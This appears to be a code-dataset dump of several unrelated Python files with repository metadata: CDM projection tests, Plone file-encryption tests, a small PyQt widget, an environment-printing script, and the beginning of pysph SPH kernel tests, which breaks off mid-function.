| 37.163498 | 79 | 0.536423 | 1,446 | 9,774 | 3.57538 | 0.167358 | 0.008511 | 0.04352 | 0.020309 | 0.82882 | 0.812379 | 0.795745 | 0.777756 | 0.761122 | 0.754545 | 0 | 0.04566 | 0.321056 | 9,774 | 262 | 80 | 37.305344 | 0.733424 | 0.501023 | 0 | 0.543478 | 0 | 0 | 0.010398 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.032609 | 0 | 0.097826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b072c8c203130d79974211e801b1b0299ffca89 | 22,371 | py | Python | objectModel/Python/tests/cdm/projection/test_projection_add_attribute_group.py | MiguelSHS/microsoftCDM | d8df31fa455fcc6afd698e3ca7ec0f8c4a6716fd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/projection/test_projection_add_attribute_group.py | MiguelSHS/microsoftCDM | d8df31fa455fcc6afd698e3ca7ec0f8c4a6716fd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/projection/test_projection_add_attribute_group.py | MiguelSHS/microsoftCDM | d8df31fa455fcc6afd698e3ca7ec0f8c4a6716fd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from typing import TYPE_CHECKING
from cdm.enums import CdmObjectType
from cdm.objectmodel import CdmCorpusDefinition, CdmEntityDefinition
from cdm.utilities import ResolveOptions, AttributeResolutionDirectiveSet
from tests.common import async_test
from tests.utilities.projection_test_utils import ProjectionTestUtils
class ProjectionAddAttributeGroupTest(unittest.TestCase):
"""A test class for testing the AddAttributeGroup operation in a projection as well as attribute group creation in a resolution guidance"""
# All possible combinations of the different resolution directives
res_opts_combinations = [
[],
['referenceOnly'],
['normalized'],
['structured'],
['referenceOnly', 'normalized'],
['referenceOnly', 'structured'],
['normalized', 'structured'],
['referenceOnly', 'normalized', 'structured']
]
# The path between TestDataPath and test_name.
tests_subpath = os.path.join('Cdm', 'Projection', 'TestProjectionAddAttributeGroup')
@async_test
async def test_combine_ops_nested_proj(self):
"""Test AddAttributeGroup operation nested with ExcludeAttributes"""
test_name = 'test_combine_ops_nested_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Exclude attributes: ['age', 'phoneNumber']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup')
self.assertEqual(3, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('address', att_group_definition.members[1].name)
self.assertEqual('email', att_group_definition.members[2].name)
@async_test
async def test_combine_ops_proj(self):
"""Test AddAttributeGroup and IncludeAttributes operations in the same projection"""
test_name = 'test_combine_ops_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Included attributes: ['age', 'phoneNumber']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup', 3)
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
# Check the attributes coming from the IncludeAttribute operation
self.assertEqual('age', resolved_entity.attributes[1].name)
self.assertEqual('phoneNumber', resolved_entity.attributes[2].name)
@async_test
async def test_conditional_proj(self):
"""Test AddAttributeGroup operation with a 'structured' condition"""
test_name = 'test_conditional_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ 'referenceOnly' ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Condition not met, keep attributes in flat list
self.assertEqual(5, len(resolved_entity.attributes))
self.assertEqual('name', resolved_entity.attributes[0].name)
self.assertEqual('age', resolved_entity.attributes[1].name)
self.assertEqual('address', resolved_entity.attributes[2].name)
self.assertEqual('phoneNumber', resolved_entity.attributes[3].name)
self.assertEqual('email', resolved_entity.attributes[4].name)
resolved_entity2 = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ 'structured' ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Condition met, put all attributes in an attribute group
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity2.attributes, 'PersonAttributeGroup')
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
@async_test
async def test_conditional_proj_using_object_model(self):
"""Test for creating a projection with an AddAttributeGroup operation and a condition using the object model"""
test_name = 'test_conditional_proj_using_object_model'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
local_root = corpus.storage.fetch_root_folder('local')
# Create an entity.
entity = ProjectionTestUtils.create_entity(corpus, local_root)
# Create a projection with a condition that states the operation should only execute when the resolution directive is 'structured'.
projection = ProjectionTestUtils.create_projection(corpus, local_root)
projection.condition = 'structured==true'
# Create an AddAttributeGroup operation
add_att_group_op = corpus.make_object(CdmObjectType.OPERATION_ADD_ATTRIBUTE_GROUP_DEF)
add_att_group_op.attribute_group_name = 'PersonAttributeGroup'
projection.operations.append(add_att_group_op)
# Create an entity reference to hold this projection.
projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None) # type: CdmEntityReference
projection_entity_ref.explicit_reference = projection
# Create an entity attribute that contains this projection and add this to the entity.
entity_attribute = corpus.make_object(CdmObjectType.ENTITY_ATTRIBUTE_DEF, 'TestEntityAttribute') # type: CdmEntityAttributeDefinition
entity_attribute.entity = projection_entity_ref
entity.attributes.append(entity_attribute)
# Create resolution options with the 'referenceOnly' directive.
res_opt = ResolveOptions(entity.in_document)
res_opt.directives = AttributeResolutionDirectiveSet({'referenceOnly'})
# Resolve the entity with 'referenceOnly'
resolved_entity_with_reference_only = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), res_opt, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
# Condition not met, keep attributes in flat list
self.assertEqual(4, len(resolved_entity_with_reference_only.attributes))
self.assertEqual('id', resolved_entity_with_reference_only.attributes[0].name)
self.assertEqual('name', resolved_entity_with_reference_only.attributes[1].name)
self.assertEqual('value', resolved_entity_with_reference_only.attributes[2].name)
self.assertEqual('date', resolved_entity_with_reference_only.attributes[3].name)
# Now resolve the entity with the 'structured' directive
res_opt.directives = AttributeResolutionDirectiveSet({'structured'})
resolved_entity_with_structured = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), res_opt, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
# Condition met, put all attributes in an attribute group
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity_with_structured.attributes, 'PersonAttributeGroup')
self.assertEqual(4, len(att_group_definition.members))
self.assertEqual('id', att_group_definition.members[0].name)
self.assertEqual('name', att_group_definition.members[1].name)
self.assertEqual('value', att_group_definition.members[2].name)
self.assertEqual('date', att_group_definition.members[3].name)
@async_test
async def test_entity_attribute(self):
"""Test resolving an entity attribute using resolution guidance"""
test_name = 'test_entity_attribute'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ 'structured' ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonInfo')
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
@async_test
async def test_entity_attribute_proj_using_object_model(self):
"""Test for creating a projection with an AddAttributeGroup operation on an entity attribute using the object model"""
test_name = 'test_entity_attribute_proj_using_object_model'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
local_root = corpus.storage.fetch_root_folder('local')
# Create an entity
entity = ProjectionTestUtils.create_entity(corpus, local_root) # type: CdmEntityDefinition
# Create a projection
projection = ProjectionTestUtils.create_projection(corpus, local_root) # type: CdmProjection
# Create an AddAttributeGroup operation
add_att_group_op = corpus.make_object(CdmObjectType.OPERATION_ADD_ATTRIBUTE_GROUP_DEF) # type: CdmOperationAddAttributeGroup
add_att_group_op.attribute_group_name = 'PersonAttributeGroup'
projection.operations.append(add_att_group_op)
# Create an entity reference to hold this projection
projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None) # type: CdmEntityReference
projection_entity_ref.explicit_reference = projection
# Create an entity attribute that contains this projection and add this to the entity
entity_attribute = corpus.make_object(CdmObjectType.ENTITY_ATTRIBUTE_DEF, 'TestEntityAttribute') # type: CdmEntityAttributeDefinition
entity_attribute.entity = projection_entity_ref
entity.attributes.append(entity_attribute)
# Resolve the entity.
resolved_entity = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), None, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup')
self.assertEqual(4, len(att_group_definition.members))
self.assertEqual('id', att_group_definition.members[0].name)
self.assertEqual('name', att_group_definition.members[1].name)
self.assertEqual('value', att_group_definition.members[2].name)
self.assertEqual('date', att_group_definition.members[3].name)
@async_test
async def test_entity_proj_using_object_model(self):
"""Test for creating a projection with an AddAttributeGroup operation on an entity definition using the object model"""
test_name = 'test_entity_proj_using_object_model'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
local_root = corpus.storage.fetch_root_folder('local')
# Create an entity
entity = ProjectionTestUtils.create_entity(corpus, local_root) # type: CdmEntityDefinition
# Create a projection
projection = ProjectionTestUtils.create_projection(corpus, local_root) # type: CdmProjection
# Create an AddAttributeGroup operation
add_att_group_op = corpus.make_object(CdmObjectType.OPERATION_ADD_ATTRIBUTE_GROUP_DEF) # type: CdmOperationAddAttributeGroup
add_att_group_op.attribute_group_name = 'PersonAttributeGroup'
projection.operations.append(add_att_group_op)
# Create an entity reference to hold this projection
projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None) # type: CdmEntityReference
projection_entity_ref.explicit_reference = projection
# Set the entity's ExtendEntity to be the projection
entity.extends_entity = projection_entity_ref
# Resolve the entity
resolved_entity = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), None, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup')
self.assertEqual(4, len(att_group_definition.members))
self.assertEqual('id', att_group_definition.members[0].name)
self.assertEqual('name', att_group_definition.members[1].name)
self.assertEqual('value', att_group_definition.members[2].name)
self.assertEqual('date', att_group_definition.members[3].name)
@async_test
async def test_extends_entity_proj(self):
"""Test AddAttributeGroup operation on an entity definition"""
test_name = 'test_extends_entity_proj'
entity_name = 'Child'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'ChildAttributeGroup')
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
@async_test
async def test_multiple_op_proj(self):
"""Multiple AddAttributeGroup operations on the same projection """
test_name = 'test_multiple_op_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# This will result in two attribute groups with the same set of attributes being generated
att_group1 = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup', 2) # type: CdmAttributeGroupDefinition
self.assertEqual(5, len(att_group1.members))
self.assertEqual('name', att_group1.members[0].name)
self.assertEqual('age', att_group1.members[1].name)
self.assertEqual('address', att_group1.members[2].name)
self.assertEqual('phoneNumber', att_group1.members[3].name)
self.assertEqual('email', att_group1.members[4].name)
att_group2 = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'SecondAttributeGroup', 2, 1) # type: CdmAttributeGroupDefinition
self.assertEqual(5, len(att_group2.members))
self.assertEqual('name', att_group2.members[0].name)
self.assertEqual('age', att_group2.members[1].name)
self.assertEqual('address', att_group2.members[2].name)
self.assertEqual('phoneNumber', att_group2.members[3].name)
self.assertEqual('email', att_group2.members[4].name)
@async_test
async def test_nested_proj(self):
"""Nested projections with AddAttributeGroup"""
test_name = 'test_nested_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
outer_att_group = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'OuterAttributeGroup') # type: CdmAttributeGroupDefinition
inner_att_group = ProjectionTestUtils.validate_attribute_group(self, outer_att_group.members, 'InnerAttributeGroup')
self.assertEqual(5, len(inner_att_group.members))
self.assertEqual('name', inner_att_group.members[0].name)
self.assertEqual('age', inner_att_group.members[1].name)
self.assertEqual('address', inner_att_group.members[2].name)
self.assertEqual('phoneNumber', inner_att_group.members[3].name)
self.assertEqual('email', inner_att_group.members[4].name)
@unittest.skip
@async_test
async def test_type_attribute_proj(self):
"""Test resolving a type attribute with an add attribute group operation"""
test_name = 'test_type_attribute_proj'
entity_name = 'Person'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
self.assertEqual(5, len(resolved_entity.attributes))
self.assertEqual('name', resolved_entity.attributes[0].name)
self.assertEqual('age', resolved_entity.attributes[1].name)
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'AddressAttributeGroup', 5, 2)
self.assertEqual('address', att_group_definition.members[0].name)
self.assertEqual('phoneNumber', resolved_entity.attributes[3].name)
self.assertEqual('email', resolved_entity.attributes[4].name)
| 60.137097 | 166 | 0.739439 | 2,577 | 22,371 | 6.158324 | 0.079938 | 0.075614 | 0.060113 | 0.069313 | 0.835539 | 0.811153 | 0.781916 | 0.738815 | 0.711846 | 0.706238 | 0 | 0.006327 | 0.166376 | 22,371 | 371 | 167 | 60.299191 | 0.844657 | 0.172947 | 0 | 0.605042 | 0 | 0 | 0.090914 | 0.02943 | 0 | 0 | 0 | 0 | 0.336134 | 1 | 0 | false | 0 | 0.033613 | 0 | 0.046218 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b257ff22c24daf4b4b739bdca01754aeab1287a | 5,023 | py | Python | ims/encryptedfile/tests/test_encrypt_decrypt.py | imsweb/ims.encryptedfile | 0c9b588d1b7d2fad4c9d1c4de5325428f081968b | [
"MIT"
] | null | null | null | ims/encryptedfile/tests/test_encrypt_decrypt.py | imsweb/ims.encryptedfile | 0c9b588d1b7d2fad4c9d1c4de5325428f081968b | [
"MIT"
] | null | null | null | ims/encryptedfile/tests/test_encrypt_decrypt.py | imsweb/ims.encryptedfile | 0c9b588d1b7d2fad4c9d1c4de5325428f081968b | [
"MIT"
] | null | null | null | import os
from plone import api
from plone.namedfile import NamedFile
from zope.component import getUtility
from . import base
from ..interfaces import IEncryptionUtility
from ..utility import DecryptionError
base_path = os.path.dirname(os.path.realpath(__file__))
class TestEncryptDecrypt(base.IntegrationTestCase):
def test_encrypt(self):
"""Test encrypt with file format 7z and zip"""
util = getUtility(IEncryptionUtility)
file_name = 'file_to_encrypt.txt'
with open(os.path.join(base_path, file_name)) as f:
file_data = NamedFile(f.read(), filename=file_name)
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt(file_data, file_format, file_name, password)
# checking the type
self.assertIsInstance(blob, NamedFile)
# zip
file_format = 'zip'
blob = util.encrypt(file_data, file_format, file_name, password)
# checking the type
self.assertIsInstance(blob, NamedFile)
def test_decrypt(self):
"""Test decrypt with file format 7z and zip"""
util = getUtility(IEncryptionUtility)
file_name = 'file_to_encrypt.txt'
with open(os.path.join(base_path, file_name)) as f:
file_data = NamedFile(f.read(), filename=file_name)
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt(file_data, file_format, file_name, password)
d_file_data, d_file_name = util.decrypt(blob, password)
# Comparing the decrypted file data to what was actually written in the file
self.assertEqual(d_file_data, b'File to be encrypted.')
self.assertEqual(d_file_name, file_name)
# zip
file_format = 'zip'
blob = util.encrypt(file_data, file_format, file_name, password)
d_file_data, d_file_name = util.decrypt(blob, password)
# Comparing the decrypted file data to what was actually written in the file
self.assertEqual(d_file_data, b'File to be encrypted.')
self.assertEqual(d_file_name, file_name)
def test_encrypt_folder_multiple(self):
"""
Test encrypt_folder_multiple with file format 7z and zip.
Test that error is raised when a folder with multiple files is decrypted
"""
util = getUtility(IEncryptionUtility)
portal = api.portal.get()
obj1 = api.content.create(
type='File',
title='Test document 1',
container=portal)
obj1.file = NamedFile("Text that need encryption", filename='testfile.txt')
obj2 = api.content.create(
type='File',
title='Test document 2',
container=portal)
obj2.file = NamedFile("To the moon and back", filename='testfile2.txt')
obj3 = api.content.create(
type='File',
title='Test document 3',
container=portal)
obj3.file = NamedFile("The mars rover.!2", filename='testfile3.txt')
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt_folder_multiple(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
# error testing
with self.assertRaises(DecryptionError):
util.decrypt(blob, password)
# zip
file_format = 'zip'
blob = util.encrypt_folder_multiple(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
# error testing
with self.assertRaises(DecryptionError):
util.decrypt(blob, password)
def test_encrypt_folder_single(self):
"""
Test encrypt_folder_single with file format 7z and zip
and that a zip file is returned in both cases.
"""
util = getUtility(IEncryptionUtility)
portal = api.portal.get()
obj1 = api.content.create(
type='File',
title='Test document 1',
container=portal)
obj1.file = NamedFile("Text that needs encryption", filename='testfile.txt')
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt_folder_single(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
d_file_data, d_file_name = util.decrypt(blob, password)
# making sure it returns a zip file
num = len(d_file_name) - 4 # for .zip
zip_file = d_file_name[num:]
self.assertEqual(zip_file, '.zip')
# zip
file_format = 'zip'
blob = util.encrypt_folder_single(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
d_file_data, d_file_name = util.decrypt(blob, password)
# making sure it returns a zip file
num = len(d_file_name) - 4 # for .zip
zip_file = d_file_name[num:]
self.assertEqual(zip_file, '.zip')
def test_suite():
import unittest
return unittest.defaultTestLoader.loadTestsFromName(__name__)
| 35.373239 | 84 | 0.637269 | 606 | 5,023 | 5.107261 | 0.186469 | 0.056866 | 0.029079 | 0.063974 | 0.739257 | 0.739257 | 0.72504 | 0.72504 | 0.688207 | 0.688207 | 0 | 0.007937 | 0.272546 | 5,023 | 141 | 85 | 35.624113 | 0.83908 | 0.128011 | 0 | 0.73913 | 0 | 0 | 0.082517 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 1 | 0.054348 | false | 0.195652 | 0.086957 | 0 | 0.163043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
6b272c80ce6da8ce9664a05b91f35800feaead21 | 29 | py | Python | app_store_connect_files/environ_test.py | VladKhol/Apple_Appstore_Data_Pipeline | 9f2000b76cd690a53534ee039a210cd485f7a32e | [
"MIT"
] | 6 | 2020-05-23T19:53:25.000Z | 2021-05-08T20:21:30.000Z | GodwillOnyewuchi/Phase 1/Python Basic 2/day 7 task/task 3.py | GREENFONTS/python-challenge-solutions | a9aad85a250892fe41961a7d5e77f67b8d14fc1b | [
"MIT"
] | 8 | 2020-05-14T18:53:12.000Z | 2020-07-03T00:06:20.000Z | GodwillOnyewuchi/Phase 1/Python Basic 2/day 7 task/task 3.py | GREENFONTS/python-challenge-solutions | a9aad85a250892fe41961a7d5e77f67b8d14fc1b | [
"MIT"
] | 39 | 2020-05-10T20:55:02.000Z | 2020-09-12T17:40:59.000Z | import os
print(os.environ)
| 7.25 | 17 | 0.758621 | 5 | 29 | 4.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 3 | 18 | 9.666667 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
861695dd61fc5887ccd9f824c0684021549e8d0b | 75 | py | Python | pineboolib/qt3_widgets/qspinbox.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | [
"MIT"
] | 2 | 2015-09-19T16:54:49.000Z | 2016-09-12T08:06:29.000Z | pineboolib/qt3_widgets/qspinbox.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | [
"MIT"
] | 1 | 2017-08-14T17:07:14.000Z | 2017-08-15T00:22:47.000Z | pineboolib/qt3_widgets/qspinbox.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | [
"MIT"
] | 9 | 2015-01-15T18:15:42.000Z | 2019-05-05T18:53:00.000Z | from PyQt5 import QtWidgets
class QSpinBox(QtWidgets.QSpinBox):
pass
| 12.5 | 35 | 0.773333 | 9 | 75 | 6.444444 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 0.173333 | 75 | 5 | 36 | 15 | 0.919355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
8654432280fed620c96ee5e35687a35e153afacf | 18,718 | py | Python | pysph/base/tests/test_kernel.py | nauaneed/pysph | 9cb9a859934939307c65a25cbf73e4ecc83fea4a | [
"BSD-3-Clause"
] | 293 | 2017-05-26T14:41:15.000Z | 2022-03-28T09:56:16.000Z | pysph/base/tests/test_kernel.py | nauaneed/pysph | 9cb9a859934939307c65a25cbf73e4ecc83fea4a | [
"BSD-3-Clause"
] | 217 | 2017-05-29T15:48:14.000Z | 2022-03-24T16:16:55.000Z | pysph/base/tests/test_kernel.py | nauaneed/pysph | 9cb9a859934939307c65a25cbf73e4ecc83fea4a | [
"BSD-3-Clause"
] | 126 | 2017-05-25T19:17:32.000Z | 2022-03-25T11:23:24.000Z | import numpy as np
try:
from scipy.integrate import quad
except ImportError:
quad = None
from unittest import TestCase, main
from pysph.base.kernels import (CubicSpline, Gaussian, QuinticSpline,
SuperGaussian, WendlandQuintic,
WendlandQuinticC4, WendlandQuinticC6,
WendlandQuinticC2_1D, WendlandQuinticC4_1D,
WendlandQuinticC6_1D, get_compiled_kernel)
###############################################################################
# `TestKernelBase` class.
###############################################################################
class TestKernelBase(TestCase):
"""Base class for all kernel tests.
"""
kernel_factory = None
@classmethod
def setUpClass(cls):
cls.wrapper = get_compiled_kernel(cls.kernel_factory())
cls.kernel = cls.wrapper.kernel
cls.gradient = cls.wrapper.gradient
def setUp(self):
self.kernel = self.__class__.kernel
self.gradient = self.__class__.gradient
def check_kernel_moment_1d(self, a, b, h, m, xj=0.0):
func = self.kernel
if m == 0:
def f(x): return func(x, 0, 0, xj, 0, 0, h)
else:
def f(x): return (pow(x, m) * func(x, 0, 0, xj, 0, 0, h))
if quad is None:
kern_f = np.vectorize(f)
nx = 201
x = np.linspace(a, b, nx)
result = np.sum(kern_f(x)) * (b - a) / (nx - 1)
else:
result = quad(f, a, b)[0]
return result
def check_grad_moment_1d(self, a, b, h, m, xj=0.0):
func = self.gradient
if m == 0:
def f(x): return func(x, 0, 0, xj, 0, 0, h)[0]
else:
def f(x): return (pow(x - xj, m) * func(x, 0, 0, xj, 0, 0, h)[0])
if quad is None:
kern_f = np.vectorize(f)
nx = 201
x = np.linspace(a, b, nx)
return np.sum(kern_f(x)) * (b - a) / (nx - 1)
else:
return quad(f, a, b)[0]
def check_kernel_moment_2d(self, m, n):
x0, y0, z0 = 0.5, 0.5, 0.0
def func(x, y):
fac = pow(x - x0, m) * pow(y - y0, n)
return fac * self.kernel(x, y, 0.0, x0, y0, 0.0, 0.15)
vfunc = np.vectorize(func)
nx, ny = 101, 101
